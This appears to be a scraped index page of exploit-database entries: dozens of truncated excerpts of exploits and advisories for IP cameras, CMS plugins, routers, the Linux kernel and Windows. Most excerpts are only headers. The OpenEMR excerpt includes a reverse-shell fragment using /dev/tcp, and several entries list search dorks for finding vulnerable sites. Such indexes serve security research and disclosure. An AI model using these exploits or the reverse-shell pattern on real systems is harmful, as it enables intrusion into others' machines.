BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution

BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution Vendor: Beward R&D Co., Ltd Product web page: https://www.beward.net Affected version: M2.1.6.04C014 Summary: The N100 compact color IP camera with support for a more...

R 3.4.4 - Buffer Overflow (SEH)

R 3.4.4 - Buffer Overflow SEH -------------------------------------------------------- Exploit Title: R v3.4.4 - SEH Buffer Overflow Exploit Exploit Author : ZwX Exploit Date: 2018-08-22 Vendor Homepage : https://www.r-project.org/ Tested on OS: Windows 7 Social: twitter.com/ZwX2a contact:...

SEIG Modbus 3.4 - Denial of Service (PoC)

SEIG Modbus 3.4 - Denial of Service PoC Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link:...

OpenEMR 5.0.1 - (Authenticated) Remote Code Execution

OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

10-Strike Network Inventory Explorer 8.54 - Registration Key Buffer Overflow (SEH)

10-Strike Network Inventory Explorer 8.54 - Registration Key Buffer Overflow SEH...

CloudMe Sync 1.11.0 - Buffer Overflow

CloudMe Sync 1.11.0 - Buffer Overflow + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt + ISR: Apparition Security + SSD Beyond Security Submission:...

Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection

Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla Google Dork: if applicable Date: 2016-09-15 Exploit Author: Larry W. Cashdollar, @larry0 Vendor Homepage: http://huge-it.com/joomla-video-gallery/...

WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow

WebKitGTK 2.1.2 Ubuntu 14.04 - Heap based Buffer Overflow CVE-2014-1303 PoC for Linux CVE-2014-1303 WebKit Heap based BOF proof of concept for Linux. This repository demonstrates the WebKit heap based buffer overflow vulnerability CVE-2014-1303 on Linux. NOTE: Original exploit is written for Mac ...

Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities

Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities 1. Advisory Information Title: Kaspersky Anti-Virus File Server Multiple Vulnerabilities Advisory ID: CORE-2017-0003 Advisory URL: http://www.coresecurity.com/advisories/Kaspersky-Anti-Virus-File-Server-Multiple-Vulnerabilities...

Peplink Balance Routers 7.0.0-build1904 - SQL Injection Cross-Site Scripting Information Disclosure

Peplink Balance Routers 7.0.0-build1904 - SQL Injection Cross-Site Scripting Information Disclosure X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions:...

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation Vendor: Petr Nejedly | Six Lines Ltd Product web page: http://www.serviio.org Affected version: 1.8.0.0 PRO Summary: Serviio is a free media server. It...

QNAP QTS 4.2.4 - Domain Privilege Escalation

QNAP QTS 4.2.4 - Domain Privilege Escalation QNAP QTS Domain Privilege Escalation Vulnerability Name Sensitive Data Exposure in QNAP QTS Systems Affected QNAP QTS NAS all model and all versions 4.2.4 Severity High 7.9/10 Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L Vendor...

Haraka 2.8.9 - Remote Command Execution

Haraka 2.8.9 - Remote Command Execution !/usr/bin/python Exploit Title: Harakiri ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection Exploit Author: xychix xychix at hotmail.com / mark at outflank.nl Date: 26 Januar...

Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities

Trend Micro InterScan Web Security Virtual Appliance IWSVA 6.5 SP2 - Multiple Vulnerabilities Exploit Title: Trend Micro Interscan Web Security Virtual Appliance IWSVA 6.5.x Multiple Vulnerabilities Date: 12/01/2017 Exploit Author: SlidingWindow , Twitter: @KapilKhot Vendor Homepage:...

DotNetNuke 07.04.00 - Administration Authentication Bypass

DotNetNuke 07.04.00 - Administration Authentication Bypass Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass Date: 06-05-2016 Exploit Author: Marios Nicolaides Vendor Homepage: http://www.dnnsoftware.com/ Software Link: https://dotnetnuke.codeplex.com/releases/view/611324...

pfSense 2.2 - Multiple Vulnerabilities

pfSense 2.2 - Multiple Vulnerabilities Advisory ID: HTB23251 Product: pfSense Vendor: Electric Sheep Fencing LLC Vulnerable Versions: 2.2 and probably prior Tested Version: 2.2 Advisory Publication: March 4, 2015 without technical details Vendor Notification: March 4, 2015 Vendor Patch: March 5,...

CodoForum 2.5.1 - Arbitrary File Download

CodoForum 2.5.1 - Arbitrary File Download Exploit Title: Codoforum 2.5.1 Arbitrary File Download Date: 23-11-2014 Software Link: https://codoforum.com/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl/ Category: webapps CVE: CVE-2014-9261 1...

Lorex LH300 Series - ActiveX Buffer Overflow (PoC)

Lorex LH300 Series - ActiveX Buffer Overflow PoC Disclosure: 09/01/2014 / Last updated: 18/01/2015 Hi, I have discovered a buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. The company is Lorex...

phpMyAdmin 4.0.x4.1.x4.2.x - Denial of Service

phpMyAdmin 4.0.x4.1.x4.2.x - Denial of Service ============= DESCRIPTION: ============= A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to cause a denial of service resource consumption via a long password...

Linux Kernel 3.14-rc1 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation

Linux Kernel 3.14-rc1 3.15-rc4 x64 - Raw Mode PTY Echo Race Condition Privilege Escalation / CVE-2014-0196: Linux kernel = v3.14-rc1 Matthew Daley Usage: $ gcc cve-2014-0196-md.c -lutil -lpthread $ ./a.out + Resolving symbols + Resolved commitcreds: 0xffffffff81056694 + Resolved preparekernelcred...

WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities

WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities Advisory ID: HTB23199 Product: VideoWhisper Live Streaming Integration Vendor: VideoWhisper Vulnerable Versions: 4.27.3 and probably prior Tested Version: 4.27.3 Advisory Publication: February 6, 2014 without technical details Vendor...

WordPress Plugin AdRotate 3.9.4 - clicktracker.ph?track SQL Injection

WordPress Plugin AdRotate 3.9.4 - clicktracker.ph?track SQL Injection Advisory ID: HTB23201 Product: AdRotate Vendor: AJdG Solutions Vulnerable Versions: 3.9.4 and probably prior Tested Version: 3.9.4 Advisory Publication: January 30, 2014 without technical details Vendor Notification: January 30...

Horizon QCMS 4.0 - Multiple Vulnerabilities

Horizon QCMS 4.0 - Multiple Vulnerabilities Advisory ID: HTB23191 Product: Horizon QCMS Vendor: Horizon QCMS Vulnerable Versions: 4.0 and probably prior Tested Version: 4.0 Advisory Publication: December 18, 2013 without technical details Vendor Notification: December 18, 2013 Vendor Patch:...

InstantCMS 1.10.3 - Blind SQL Injection

InstantCMS 1.10.3 - Blind SQL Injection Advisory ID: HTB23185 Product: InstantCMS Vendor: InstantSoft Vulnerable Versions: 1.10.3 and probably prior Tested Version: 1.10.3 Advisory Publication: November 20, 2013 without technical details Vendor Notification: November 20, 2013 Vendor Patch: Novemb...

Vivotek IP Cameras - RTSP Authentication Bypass

Vivotek IP Cameras - RTSP Authentication Bypass Core Security - Corelabs Advisory http://corelabs.coresecurity.com Vivotek IP Cameras RTSP Authentication Bypass 1. Advisory Information Title: Vivotek IP Cameras RTSP Authentication Bypass Advisory ID: CORE-2013-0704 Advisory URL:...

TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities

TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras 1. Advisory Information Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras Advisory ID: CORE-2013-0618...

PHP 5.3.6 - Local Buffer Overflow (ROP)

PHP 5.3.6 - Local Buffer Overflow ROP ?php / Jonathan Salwan - @jonathansalwan http://shell-storm.org 2011-06-04 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 Stack-based buffer overflow in the socketconnect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow...

PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference

PHP 5.3.5 libzip 0.9.3 - zipnamelocate Null Pointer Dereference Source: http://securityreason.com/securityalert/8146 libzip 0.9.3 zipnamelocate NULL Pointer Dereference incl PHP 5.3.5 Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - Dis.: 03.01.2011 - Pub.:...

Oracle - Document Capture Insecure READ Method

Oracle - Document Capture Insecure READ Method Source: http://packetstormsecurity.org/files/view/97872/DSECRG-11-007.txt Digital Security Research Group DSecRG Advisory DSECRG-11-007 Internal DSECRG-00117 Application: Oracle Document Capture Versions Affected: 10.1350.0005 Vendor URL:...

Native Instruments Kontakt 4 Player - .NKI File Syntactic Analysis Buffer Overflow (PoC)

Native Instruments Kontakt 4 Player - .NKI File Syntactic Analysis Buffer Overflow PoC / Title: Native Instruments Kontakt 4 Player NKI File Syntactic Analysis Buffer Overflow PoC Vendor: Native Instruments GmbH Product web page: http://www.native-instruments.com Affected version: 4.1.3.4125...

Mozilla Firefox - Simplified Memory Corruption (PoC)

Mozilla Firefox - Simplified Memory Corruption PoC Hi there, For those who still do not know .. The proof of concept that I have extracted for CVE-2010-3765 is the following: function Gstr var cobj=document.createElementstr; document.body.appendChildcobj; cobj.scrollWidth; function crashme...

LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form

LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form 1. Advisory...

Linux Kernel 2.6.36-rc6 (RedHat Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure

Linux Kernel 2.6.36-rc6 RedHat Ubuntu 10.04 - pktcdvd Kernel Memory Disclosure / cve-2010-3437.c Linux Kernel http://jon.oberheide.org Information: https://bugzilla.redhat.com/showbug.cgi?id=638085 The PKTCTRLCMDSTATUS device ioctl retrieves a pointer to a pktcdvddevice from the global pktdevs...

FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution

FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution Trustwave's SpiderLabs Security Advisory TWSL2010-005: FreePBX recordings interface allows remote code execution https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt Published: 2010-09-23 Version: 1.0 Vendor: FreePBX...

crownweb - page.cfm SQL Injection

crownweb - page.cfm SQL Injection crownweb page.cfm Sql Injection Vulnerability =================================================================== .:. Email : [email protected] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : crownweb .:. Language : Cfm .:. Script Download:...

Elkagroup - SQL Injection

Elkagroup - SQL Injection Dork : "powered by: elkagroup" + |SadHaCkEr|\ + ||||\ + ||||""|", + ||||""|"||| + " @''@""""""|@@@ +========================================================================================================================================|| About : elkagroup SQL Injection...

BPStudent 1.0 - Blind SQL Injection

BPStudent 1.0 - Blind SQL Injection x========================================================================================================================================x | AntiSecuritydotorg |...

Acoustica Mixcraft 4.2 Build 98 - mx4 Local Buffer Overflow

Acoustica Mixcraft 4.2 Build 98 - mx4 Local Buffer Overflow !/usr/bin/perl Acoustica Mixcraft mx4 file Local Buffer Overflow Exploit Author: Koshi Date: 08-28-08 0day Application: Acoustica Mixcraft Versions: Possibly Older / 4.1 Build 96 / 4.2 Build 98 Site:...

PHPhotoalbum 0.5 - Multiple SQL Injections

PHPhotoalbum 0.5 - Multiple SQL Injections Name : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities Author : cOndemned Dork : intext:PHPhotoalbum v0.5 Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ; Proof of Concept :...

Smoothflash - cid SQL Injection

Smoothflash - cid SQL Injection Powered by Smoothflash SQL injection Powered by Newartonline AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : "Powered by Smoothflash" DORK 2 : allinurl:...

XCMS 1.83 - Remote Command Execution

XCMS 1.83 - Remote Command Execution Name : XCMS So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. So let's take a look to the bugged code. So with a simple html form we can change the footer. Ex: /textarea input type=...

DRBGuestbook 1.1.13 - index.php Cross-Site Scripting

DRBGuestbook 1.1.13 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/25911/info DRBGuestbook is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute...

simple file manager 0.24a - Multiple Vulnerabilities

simple file manager 0.24a - Multiple Vulnerabilities /\ | flame vrs Simple File Manager | | http://onedotoh.sourceforge.net/ | | Various Vulnerbilities Including: | / /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | |...

Les Visiteurs 2.0 - Multiple Remote File Inclusions

Les Visiteurs 2.0 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/20259/info Les Visiteurs is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise...

phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion

phpBB Knowledge Base 2.0.2 - Mod KBconstants.php Remote File Inclusion source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An...

Microsoft Windows - CSRSS Privilege Escalation (MS05-018)

Microsoft Windows - CSRSS Privilege Escalation MS05-018 include include include pragma comment lib,"Advapi32.lib" typedef struct CONSOLESTATEINFO / 0x00 / DWORD cbSize; / 0x04 / COORD ScreenBufferSize; / 0x08 / COORD WindowSize; / 0x0c / POINT WindowPosition; / 0x14 / COORD FontSize; / 0x18 / DWO...

W-Agora 4.1.6 - a redir_url.php?key SQL Injection

W-Agora 4.1.6 - a redirurl.php?key SQL Injection source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to...

Microsoft Windows - JPEG GDI+ BindReverseAdminFile Download

Microsoft Windows - JPEG GDI+ BindReverseAdminFile Download / Exploit Name: ============= JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload ============= Tweaked Exploit By M4Z3R For GSO All Credits & Greetings Go To: ========== FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha,...

Apache mod_ssl 2.8.7 OpenSSL - OpenFuck.c Remote Buffer Overflow

Apache modssl 2.8.7 OpenSSL - OpenFuck.c Remote Buffer Overflow / source: https://www.securityfocus.com/bid/5363/info A buffer-overflow vulnerability has been reported in some versions of OpenSSL. The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protoco...

Jira 8.3.4 - Information Disclosure (Username Enumeration)

Jira 8.3.4 - Information Disclosure Username Enumeration Exploit Title: Jira 8.3.4 - Information Disclosure Username Enumeration Date: 2019-09-11 Exploit Author: Mufeed VH Vendor Homepage: https://www.atlassian.com/ Software Link: https://www.atlassian.com/software/jira Version: 8.3.4 Tested on:...